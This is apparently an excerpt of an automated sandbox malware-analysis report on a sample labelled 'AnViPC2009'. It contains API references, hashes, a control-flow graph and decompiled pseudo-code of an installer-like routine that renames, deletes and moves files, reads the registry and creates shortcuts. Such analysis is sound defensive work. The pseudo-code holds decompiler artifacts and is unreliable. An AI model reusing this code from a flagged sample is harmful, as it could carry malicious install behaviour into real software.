                                                                                                                                                    • Part of subcall function 00404FA3: GetLastError.KERNEL32(?,0040A7D3,?,?,00405524,?,?), ref: 00404FC7
                                                                                                                                                    • Part of subcall function 0040E1E9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,0040515F,?,?,01000000,?), ref: 0040E203
                                                                                                                                                  • CharToOemA.USER32 ref: 00402165
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$ByteErrorFileLastMultiPointerWide
                                                                                                                                                  • String ID: - ???$???$|LA$|LA$|LA$|LA
                                                                                                                                                  • API String ID: 1784729808-3627379113
                                                                                                                                                  • Opcode ID: 0ae667f308ce3594e004c6c1a57aba8cd37a35e2631e99bb349059da5303d4f6
                                                                                                                                                  • Instruction ID: 577cc1d17dabae46a3fbc48cbcf6cd12d1d297fcd7da7c9c8a2f67ec11cd559e
                                                                                                                                                  • Opcode Fuzzy Hash: 0ae667f308ce3594e004c6c1a57aba8cd37a35e2631e99bb349059da5303d4f6
                                                                                                                                                  • Instruction Fuzzy Hash: 2D32C1719002049BDF14DFA5C985AEEB7B9AF40304F14017FF946BB2D2EB786A44CB68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1207 40c770-40c774 1208 40c77a-40c78a call 40a229 1207->1208 1209 40ca0c-40ca34 call 40b5ec 1207->1209 1214 40c78c-40c78f 1208->1214 1215 40c7af 1208->1215 1220 40bfba-40bfda 1209->1220 1221 40ca3a-40ca3e 1209->1221 1217 40c791-40c792 1214->1217 1218 40c7a6-40c7ad 1214->1218 1219 40c7b6-40c7de call 40a450 1215->1219 1223 40c794-40c79b 1217->1223 1224 40c79d-40c7a4 1217->1224 1218->1219 1231 40c7e0-40c803 call 40a450 call 407384 1219->1231 1232 40c81f-40c82f call 40572e 1219->1232 1222 40bfe1-40bff4 call 40a8fe 1220->1222 1234 40bff6 1222->1234 1223->1219 1224->1219 1240 40c8a2-40c8a9 1231->1240 1258 40c809-40c81a call 40a450 1231->1258 1239 40c831-40c840 1232->1239 1232->1240 1237 40bffa-40c013 lstrcmpiA 1234->1237 1241 40c023-40c027 1237->1241 1242 40c015-40c01c 1237->1242 1239->1240 1244 40c842-40c847 1239->1244 1245 40c8ab-40c8b9 call 4057e4 1240->1245 1246 40c8be-40c8f3 call 4057e4 call 40aa9b call 4076a1 1240->1246 1241->1209 1248 40c02d-40c030 1241->1248 1242->1237 1247 40c01e 1242->1247 1250 40c849-40c84c 1244->1250 1251 40c84e-40c861 call 40572e 1244->1251 1245->1246 1301 40c914-40c934 call 40a450 1246->1301 1302 40c8f5-40c90f call 40a5bb call 4076a1 1246->1302 1247->1209 1254 40c037-40c03b 1248->1254 1255 40c2ec-40c2f0 1248->1255 1256 40c2cd-40c2d1 1248->1256 1257 40c23f-40c243 1248->1257 1250->1251 1261 40c895-40c899 1250->1261 1281 40c893 1251->1281 1282 40c863-40c868 1251->1282 1254->1209 1264 40c041-40c0c3 GetCurrentDirectoryA call 40a450 call 4076a1 call 40a5bb call 405b6f call 405b9f call 403517 call 405f6f 1254->1264 1255->1209 1266 40c2f6-40c2fd 1255->1266 1256->1209 1265 40c2d7-40c2e7 SetWindowTextA 1256->1265 1257->1209 1260 40c249-40c255 1257->1260 1258->1240 1269 40c262-40c266 1260->1269 1270 40c257-40c25d call 40a5bb 1260->1270 1261->1244 1271 40c89b-40c89d 1261->1271 1372 40c0c9 1264->1372 1373 40c22f-40c23a call 405b8c 1264->1373 1265->1209 1266->1209 1267 40c303-40c317 1266->1267 1275 40c319 1267->1275 1276 40c31f-40c32a call 40a35d 1267->1276 1279 40c270-40c278 call 40b793 1269->1279 1280 40c268-40c26e 1269->1280 1270->1269 1271->1240 1278 40c89f 1271->1278 1275->1276 1276->1209 1304 40c330-40c334 1276->1304 1278->1240 1286 40c27a-40c27c 1279->1286 1280->1286 1281->1261 1288 40c86a-40c87a 1282->1288 1289 40c87c-40c880 1282->1289 1295 40c282-40c28d call 40a35d 1286->1295 1296 40c27e-40c280 1286->1296 1297 40c889-40c891 call 40a450 1288->1297 1289->1289 1298 40c882-40c883 1289->1298 1305 40c28f-40c2ac call 40a35d call 40a1fd 1295->1305 1296->1305 1297->1261 1298->1297 1325 40c936 1301->1325 1326 40c93c-40c95d call 4073b4 call 40a5bb call 407669 1301->1326 1302->1301 1312 40c3ea-40c3ec 1304->1312 1313 40c33a-40c33e 1304->1313 1336 40c2b1-40c2bc call 40a5bb 1305->1336 1337 40c2ae 1305->1337 1320 40c350-40c358 call 40a450 1312->1320 1321 40c3f2-40c3f4 1312->1321 1313->1312 1319 40c344-40c34a 1313->1319 1319->1209 1319->1320 1333 40c35d-40c36d call 40a3b2 1320->1333 1328 40c400-40c41a RegOpenKeyExA 1321->1328 1329 40c3f6-40c3fa 1321->1329 1325->1326 1374 40c96e-40c97a call 40a5bb 1326->1374 1375 40c95f-40c96c call 40a573 1326->1375 1334 40c44b-40c452 1328->1334 1335 40c41c-40c445 RegQueryValueExA RegCloseKey 1328->1335 1329->1320 1329->1328 1353 40c378-40c3c3 call 40a450 call 40b989 GetDlgItem SetWindowTextA SendMessageA call 40a4c2 1333->1353 1354 40c36f-40c373 1333->1354 1341 40c454-40c46b call 40a35d 1334->1341 1342 40c47e-40c49a call 40a35d * 2 1334->1342 1335->1334 1336->1209 1359 40c2c2-40c2c8 call 40a1de 1336->1359 1337->1336 1341->1342 1357 40c46d-40c479 call 40a5bb 1341->1357 1342->1333 1370 40c4a0-40c4ad call 40a5bb 1342->1370 1391 40c3c8-40c3ca 1353->1391 1354->1353 1362 40c375 1354->1362 1357->1342 1359->1209 1362->1353 1370->1209 1370->1333 1381 40c0ce-40c0e4 SetFileAttributesA 1372->1381 1373->1209 1385 40c97f-40c9e5 call 4058c1 call 40a996 1374->1385 1375->1374 1375->1385 1387 40c194-40c1a0 GetFileAttributesA 1381->1387 1388 40c0ea-40c0f2 call 406e67 1381->1388 1385->1209 1409 40c9e7-40c9fd SHChangeNotify 1385->1409 1389 40c1a2-40c1b1 DeleteFileA 1387->1389 1390 40c213-40c229 call 405f6f 1387->1390 1388->1387 1399 40c0f8-40c129 call 4072d9 call 4076a1 call 40a35d 1388->1399 1389->1390 1394 40c1b3-40c1b7 1389->1394 1390->1373 1390->1381 1391->1209 1395 40c3d0-40c3e5 SendMessageA 1391->1395 1400 40c1bf-40c1df wsprintfA GetFileAttributesA 1394->1400 1395->1209 1417 40c12b-40c13a call 40a35d 1399->1417 1418 40c13c-40c14c call 407252 1399->1418 1404 40c1e1-40c1f7 MoveFileA 1400->1404 1405 40c1b9-40c1bc 1400->1405 1404->1390 1408 40c1f9-40c200 call 406e67 1404->1408 1405->1400 1408->1390 1415 40c202-40c20d MoveFileExA 1408->1415 1409->1209 1415->1390 1417->1418 1423 40c152-40c18e call 40a35d call 40a262 SHFileOperationA 1417->1423 1418->1373 1418->1423 1423->1387
                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E0040C770(void* __ecx, void* __esi) {
                                                                                                                                                  				void* _t230;
                                                                                                                                                  				intOrPtr _t231;
                                                                                                                                                  				void* _t232;
                                                                                                                                                  				void* _t306;
                                                                                                                                                  				void* _t308;
                                                                                                                                                  
                                                                                                                                                  				L0:
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L0:
                                                                                                                                                  					_t306 = __esi;
                                                                                                                                                  					if( *((intOrPtr*)(_t308 + 0x10)) != 6) {
                                                                                                                                                  						goto L152;
                                                                                                                                                  					}
                                                                                                                                                  					L115:
                                                                                                                                                  					__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                  					__eax = E0040A229(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                  					__eax = __eax - 0x50;
                                                                                                                                                  					__eflags = __eax;
                                                                                                                                                  					if(__eax == 0) {
                                                                                                                                                  						 *(__ebp - 4) = 2;
                                                                                                                                                  					} else {
                                                                                                                                                  						__eax = __eax - 3;
                                                                                                                                                  						__eflags = __eax;
                                                                                                                                                  						if(__eax == 0) {
                                                                                                                                                  							 *(__ebp - 4) = 0xb;
                                                                                                                                                  						} else {
                                                                                                                                                  							__eax = __eax - 1;
                                                                                                                                                  							__eflags = __eax;
                                                                                                                                                  							if(__eax == 0) {
                                                                                                                                                  								 *(__ebp - 4) = 7;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *(__ebp - 4) = 0x10;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                  					 *(__ebp - 0x2034) = 0;
                                                                                                                                                  					 *(__ebp - 0x834) = 0;
                                                                                                                                                  					__eax = E0040A450(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                  					__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						L125:
                                                                                                                                                  						__ebp - 0xc34 = E0040572E(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                  						__eflags = __al;
                                                                                                                                                  						if(__al != 0) {
                                                                                                                                                  							goto L139;
                                                                                                                                                  						}
                                                                                                                                                  						L126:
                                                                                                                                                  						__edi = 0;
                                                                                                                                                  						__eflags =  *(__ebp - 0xc34);
                                                                                                                                                  						__esi = __ebp - 0xc34;
                                                                                                                                                  						if( *(__ebp - 0xc34) == 0) {
                                                                                                                                                  							goto L139;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L127;
                                                                                                                                                  						}
                                                                                                                                                  						do {
                                                                                                                                                  							L127:
                                                                                                                                                  							__bl = __esi->i;
                                                                                                                                                  							__eflags = __bl - 0x20;
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								L129:
                                                                                                                                                  								__eax = __ebp - 0xc34;
                                                                                                                                                  								__esi->i = 0;
                                                                                                                                                  								__eax = E0040572E(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                  								__eflags = __al;
                                                                                                                                                  								if(__al == 0) {
                                                                                                                                                  									L135:
                                                                                                                                                  									__esi->i = __bl;
                                                                                                                                                  									goto L136;
                                                                                                                                                  								}
                                                                                                                                                  								L130:
                                                                                                                                                  								__edi = __esi;
                                                                                                                                                  								__eflags = __bl - 0x2f;
                                                                                                                                                  								if(__bl != 0x2f) {
                                                                                                                                                  									do {
                                                                                                                                                  										L132:
                                                                                                                                                  										__esi =  &(__esi->i);
                                                                                                                                                  										__eflags = __esi->i - 0x20;
                                                                                                                                                  									} while (__esi->i == 0x20);
                                                                                                                                                  									_push(__esi);
                                                                                                                                                  									__eax = __ebp - 0x834;
                                                                                                                                                  									L134:
                                                                                                                                                  									_push(__eax);
                                                                                                                                                  									__eax = E0040A450();
                                                                                                                                                  									 *__edi = __bl;
                                                                                                                                                  									goto L136;
                                                                                                                                                  								}
                                                                                                                                                  								L131:
                                                                                                                                                  								_t185 =  &(__esi->i); // 0x1
                                                                                                                                                  								__eax = _t185;
                                                                                                                                                  								_push(_t185);
                                                                                                                                                  								 *(__ebp - 0x834) = __bl;
                                                                                                                                                  								__eax = __ebp - 0x833;
                                                                                                                                                  								goto L134;
                                                                                                                                                  							}
                                                                                                                                                  							L128:
                                                                                                                                                  							__eflags = __bl - 0x2f;
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								goto L136;
                                                                                                                                                  							}
                                                                                                                                                  							goto L129;
                                                                                                                                                  							L136:
                                                                                                                                                  							__esi =  &(__esi->i);
                                                                                                                                                  							__eflags = __esi->i;
                                                                                                                                                  						} while (__esi->i != 0);
                                                                                                                                                  						__eflags = __edi;
                                                                                                                                                  						if(__edi != 0) {
                                                                                                                                                  							 *__edi = 0;
                                                                                                                                                  						}
                                                                                                                                                  						goto L139;
                                                                                                                                                  					} else {
                                                                                                                                                  						L123:
                                                                                                                                                  						__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                  						E0040A450(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                  						__eax = E00407384(__ebp - 0xc33, 0x22);
                                                                                                                                                  						__eflags = __eax;
                                                                                                                                                  						if(__eax != 0) {
                                                                                                                                                  							 *__eax = 0;
                                                                                                                                                  							__ebp - 0x834 = E0040A450(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                  						}
                                                                                                                                                  						L139:
                                                                                                                                                  						__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                  						if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                  							__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                  							__eax = E004057E4(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                  						}
                                                                                                                                                  						__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                  						E004057E4(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                  						__eax = E0040AA9B(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                  						__ebp - 0x434 = E004076A1(__ebp - 0x434);
                                                                                                                                                  						__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                  						if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                  							__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                  							E0040A5BB(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                  							__eax = E004076A1(__ebp - 0x434);
                                                                                                                                                  						}
                                                                                                                                                  						__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                  						__eax = E0040A450(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                  						__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                  						__eax = __ebp - 0x74dc;
                                                                                                                                                  						if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                  							__eax = __ebp - 0xa4dc;
                                                                                                                                                  						}
                                                                                                                                                  						__ebp - 0x434 = E0040A5BB(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                  						__eax = __ebp - 0x434;
                                                                                                                                                  						__eax = E00407669(__ebp - 0x434);
                                                                                                                                                  						__eflags = __eax;
                                                                                                                                                  						if(__eax == 0) {
                                                                                                                                                  							L147:
                                                                                                                                                  							__ebp - 0x434 = E0040A5BB(__ebp - 0x434, ".lnk");
                                                                                                                                                  							goto L148;
                                                                                                                                                  						} else {
                                                                                                                                                  							L146:
                                                                                                                                                  							__eax = E0040A573(__eax, ".lnk");
                                                                                                                                                  							__eflags = __eax;
                                                                                                                                                  							if(__eax == 0) {
                                                                                                                                                  								L148:
                                                                                                                                                  								__ebp - 0x434 = E004058C1(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                  								 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                  								__ecx = __ebp - 0x834;
                                                                                                                                                  								 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                  								__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                  								__ecx = __ebp - 0x2034;
                                                                                                                                                  								 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                  								__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                  								__ecx = __ebp - 0x84dc;
                                                                                                                                                  								 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                  								__ebp - 0x44dc = E0040A996(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                  								__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                  								if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                  									__eax = __ebp - 0x34d4;
                                                                                                                                                  									SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                  								}
                                                                                                                                                  								while(1) {
                                                                                                                                                  									L152:
                                                                                                                                                  									_t230 = _t308 - 0x54dc;
                                                                                                                                                  									_t231 = E0040B5EC(0x1000, _t306);
                                                                                                                                                  									 *((intOrPtr*)(_t308 + 0xc)) = _t231;
                                                                                                                                                  									asm("ror byte [edi], 0x85");
                                                                                                                                                  									[far dword [esi+0x5b]( *((intOrPtr*)(_t308 + 0xc)), _t230, _t308 - 0x1c34, _t308 - 5, _t308 + 0xf);
                                                                                                                                                  									_t306 = GetFileAttributesA;
                                                                                                                                                  									_t232 = _t308 - 0x1c34;
                                                                                                                                                  									 *(_t308 - 4) = _t308 - 0xb4dc;
                                                                                                                                                  									 *((intOrPtr*)(_t308 - 0xc)) = 6;
                                                                                                                                                  									goto L2;
                                                                                                                                                  									L4:
                                                                                                                                                  									while(lstrcmpiA(_t308 - 0x54dc,  *(0x4140b8 +  *(_t308 - 4) * 4)) != 0) {
                                                                                                                                                  										 *(_t308 - 4) =  *(_t308 - 4) + 1;
                                                                                                                                                  										if( *(_t308 - 4) < 0xd) {
                                                                                                                                                  											continue;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L152;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(_t308 - 4) - 0xc;
                                                                                                                                                  									if( *(_t308 - 4) > 0xc) {
                                                                                                                                                  										continue;
                                                                                                                                                  									}
                                                                                                                                                  									L8:
                                                                                                                                                  									switch( *((intOrPtr*)( *(_t308 - 4) * 4 +  &M0040CA42))) {
                                                                                                                                                  										case 0:
                                                                                                                                                  											L9:
                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t308 + 0x10)) - 2;
                                                                                                                                                  											if( *((intOrPtr*)(_t308 + 0x10)) != 2) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L10:
                                                                                                                                                  											GetCurrentDirectoryA(0x400, _t308 - 0x434);
                                                                                                                                                  											E0040A450(_t308 - 0xc34, _t308 - 0x434);
                                                                                                                                                  											E004076A1(_t308 - 0xc34);
                                                                                                                                                  											E0040A5BB(_t308 - 0xc34, _t308 - 0x1c34);
                                                                                                                                                  											E00405B6F(_t308 - 0x40dc);
                                                                                                                                                  											E00405B9F(_t308 - 0x40dc, _t308 - 0xc34);
                                                                                                                                                  											E00403517(_t308 - 0x30d4);
                                                                                                                                                  											_push(0);
                                                                                                                                                  											_t301 = _t308 - 0x40dc;
                                                                                                                                                  											_t252 = E00405F6F(_t308 - 0x40dc, _t302, _t308 - 0x30d4);
                                                                                                                                                  											__eflags = _t252;
                                                                                                                                                  											if(_t252 == 0) {
                                                                                                                                                  												L27:
                                                                                                                                                  												E00405B8C(_t308 - 0x40dc);
                                                                                                                                                  												goto L152;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t295 = "%s.%d.tmp";
                                                                                                                                                  												do {
                                                                                                                                                  													L12:
                                                                                                                                                  													SetFileAttributesA(_t308 - 0x30d4, 0);
                                                                                                                                                  													__eflags =  *((char*)(_t308 - 0x24c4));
                                                                                                                                                  													if( *((char*)(_t308 - 0x24c4)) == 0) {
                                                                                                                                                  														L18:
                                                                                                                                                  														_t257 = GetFileAttributesA(_t308 - 0x30d4);
                                                                                                                                                  														__eflags = _t257 - 0xffffffff;
                                                                                                                                                  														if(_t257 == 0xffffffff) {
                                                                                                                                                  															goto L26;
                                                                                                                                                  														}
                                                                                                                                                  														L19:
                                                                                                                                                  														_t261 = DeleteFileA(_t308 - 0x30d4);
                                                                                                                                                  														__eflags = _t261;
                                                                                                                                                  														if(_t261 != 0) {
                                                                                                                                                  															goto L26;
                                                                                                                                                  														} else {
                                                                                                                                                  															 *(_t308 - 4) =  *(_t308 - 4) & _t261;
                                                                                                                                                  															_push(_t261);
                                                                                                                                                  															goto L22;
                                                                                                                                                  															L22:
                                                                                                                                                  															wsprintfA(_t308 - 0x834, _t295, _t308 - 0x30d4);
                                                                                                                                                  															_t310 = _t310 + 0x10;
                                                                                                                                                  															_t266 = GetFileAttributesA(_t308 - 0x834);
                                                                                                                                                  															__eflags = _t266 - 0xffffffff;
                                                                                                                                                  															if(_t266 != 0xffffffff) {
                                                                                                                                                  																_t60 = _t308 - 4;
                                                                                                                                                  																 *_t60 =  *(_t308 - 4) + 1;
                                                                                                                                                  																__eflags =  *_t60;
                                                                                                                                                  																_push( *(_t308 - 4));
                                                                                                                                                  																goto L22;
                                                                                                                                                  															} else {
                                                                                                                                                  																_t269 = MoveFileA(_t308 - 0x30d4, _t308 - 0x834);
                                                                                                                                                  																__eflags = _t269;
                                                                                                                                                  																if(_t269 != 0) {
                                                                                                                                                  																	_t270 = E00406E67();
                                                                                                                                                  																	__eflags = _t270;
                                                                                                                                                  																	if(_t270 != 0) {
                                                                                                                                                  																		MoveFileExA(_t308 - 0x834, 0, 4);
                                                                                                                                                  																	}
                                                                                                                                                  																}
                                                                                                                                                  																goto L26;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  													L13:
                                                                                                                                                  													__eflags = E00406E67() - 4;
                                                                                                                                                  													if(__eflags == 0) {
                                                                                                                                                  														goto L18;
                                                                                                                                                  													}
                                                                                                                                                  													L14:
                                                                                                                                                  													E004072D9(_t301, __eflags, _t308 - 0x434, _t308 - 0x2034);
                                                                                                                                                  													E004076A1(_t308 - 0x2034);
                                                                                                                                                  													_t280 = E0040A35D(_t301, _t308 - 0x434);
                                                                                                                                                  													 *((intOrPtr*)(_t308 - 0xc)) = _t280;
                                                                                                                                                  													__eflags = _t280 - 4;
                                                                                                                                                  													if(_t280 < 4) {
                                                                                                                                                  														L16:
                                                                                                                                                  														_t282 = E00407252(_t301, _t308 - 0x1c34, 0);
                                                                                                                                                  														__eflags = _t282;
                                                                                                                                                  														if(_t282 != 0) {
                                                                                                                                                  															goto L27;
                                                                                                                                                  														}
                                                                                                                                                  														L17:
                                                                                                                                                  														 *((char*)(_t308 + E0040A35D(_t301, _t308 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                  														E0040A262(_t301, _t308 - 0x34, 0, 0x1e);
                                                                                                                                                  														_push(0x14);
                                                                                                                                                  														_pop(_t287);
                                                                                                                                                  														 *((short*)(_t308 - 0x24)) = _t287;
                                                                                                                                                  														 *((intOrPtr*)(_t308 - 0x2c)) = _t308 - 0x30d4;
                                                                                                                                                  														 *((intOrPtr*)(_t308 - 0x30)) = 3;
                                                                                                                                                  														SHFileOperationA(_t308 - 0x34);
                                                                                                                                                  														goto L18;
                                                                                                                                                  													}
                                                                                                                                                  													L15:
                                                                                                                                                  													_t292 = E0040A35D(_t301, _t308 - 0x2034);
                                                                                                                                                  													__eflags =  *((intOrPtr*)(_t308 - 0xc)) - _t292;
                                                                                                                                                  													if( *((intOrPtr*)(_t308 - 0xc)) > _t292) {
                                                                                                                                                  														goto L17;
                                                                                                                                                  													}
                                                                                                                                                  													goto L16;
                                                                                                                                                  													L26:
                                                                                                                                                  													_push(0);
                                                                                                                                                  													_t301 = _t308 - 0x40dc;
                                                                                                                                                  													_t259 = E00405F6F(_t308 - 0x40dc, _t302, _t308 - 0x30d4);
                                                                                                                                                  													__eflags = _t259;
                                                                                                                                                  												} while (_t259 != 0);
                                                                                                                                                  												goto L27;
                                                                                                                                                  											}
                                                                                                                                                  										case 1:
                                                                                                                                                  											L28:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10);
                                                                                                                                                  											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                  												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                  												if(__eflags == 0) {
                                                                                                                                                  													__esi = __ebp + 0xc;
                                                                                                                                                  													__edi = E0040B793(__ebp + 0xc, __eflags);
                                                                                                                                                  												} else {
                                                                                                                                                  													__edi = __ebp - 0x1c34;
                                                                                                                                                  												}
                                                                                                                                                  												__eflags = __bl;
                                                                                                                                                  												if(__bl == 0) {
                                                                                                                                                  													__esi = E0040A35D(__ecx,  *0x41a81c);
                                                                                                                                                  												} else {
                                                                                                                                                  													__esi = 0;
                                                                                                                                                  												}
                                                                                                                                                  												E0040A35D(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                  												__eax = E0040A1FD( *0x41a81c, __eax);
                                                                                                                                                  												 *0x41a81c = __eax;
                                                                                                                                                  												__eflags = __bl;
                                                                                                                                                  												if(__bl != 0) {
                                                                                                                                                  													 *__eax = 0;
                                                                                                                                                  												}
                                                                                                                                                  												__eax = E0040A5BB(__eax, __edi);
                                                                                                                                                  												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                  												if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                  													__eax = E0040A1DE(__edi);
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											goto L152;
                                                                                                                                                  										case 2:
                                                                                                                                                  											L41:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10);
                                                                                                                                                  											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                  												__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                  											}
                                                                                                                                                  											goto L152;
                                                                                                                                                  										case 3:
                                                                                                                                                  											L43:
                                                                                                                                                  											__eflags =  *(__ebp + 0x10);
                                                                                                                                                  											if( *(__ebp + 0x10) != 0) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L44:
                                                                                                                                                  											__eflags =  *0x419f92;
                                                                                                                                                  											if( *0x419f92 != 0) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L45:
                                                                                                                                                  											__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                  											__esi = __ebp - 0x1c34;
                                                                                                                                                  											 *(__ebp - 0x434) = 0;
                                                                                                                                                  											if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                  												__esi = __ebp - 0x1c33;
                                                                                                                                                  											}
                                                                                                                                                  											__eax = E0040A35D(__ecx, __esi);
                                                                                                                                                  											__eflags = __eax - 0x400;
                                                                                                                                                  											if(__eax >= 0x400) {
                                                                                                                                                  												goto L152;
                                                                                                                                                  											} else {
                                                                                                                                                  												L48:
                                                                                                                                                  												__al = __esi->i;
                                                                                                                                                  												__eflags = __al - 0x2e;
                                                                                                                                                  												if(__al != 0x2e) {
                                                                                                                                                  													L57:
                                                                                                                                                  													__eflags = __al - 0x5c;
                                                                                                                                                  													if(__al == 0x5c) {
                                                                                                                                                  														L51:
                                                                                                                                                  														__ebp - 0x434 = E0040A450(__ebp - 0x434, __esi);
                                                                                                                                                  														L52:
                                                                                                                                                  														__eax = __ebp - 0x434;
                                                                                                                                                  														__eax = E0040A3B2(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                  														__eflags = __eax;
                                                                                                                                                  														if(__eax != 0) {
                                                                                                                                                  															__eflags =  *((char*)(__eax + 1));
                                                                                                                                                  															if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                  																 *__eax = 0;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  														__ebp - 0x434 = E0040A450(__ebx, __ebp - 0x434);
                                                                                                                                                  														__ebp - 0x434 = E0040B989(__esi, __ebp - 0x434);
                                                                                                                                                  														__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                  														__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                  														__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                  														__eax = __ebp - 0x434;
                                                                                                                                                  														__eax = E0040A4C2(__ebx, __ebp - 0x434);
                                                                                                                                                  														__eflags = __eax;
                                                                                                                                                  														if(__eax != 0) {
                                                                                                                                                  															__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                  														}
                                                                                                                                                  														goto L152;
                                                                                                                                                  													}
                                                                                                                                                  													L58:
                                                                                                                                                  													__eflags = __al;
                                                                                                                                                  													if(__al == 0) {
                                                                                                                                                  														L60:
                                                                                                                                                  														__eax = __ebp - 0x10;
                                                                                                                                                  														__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10); // executed
                                                                                                                                                  														__eflags = __eax;
                                                                                                                                                  														if(__eax == 0) {
                                                                                                                                                  															__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                  															__eax = __ebp - 0x14;
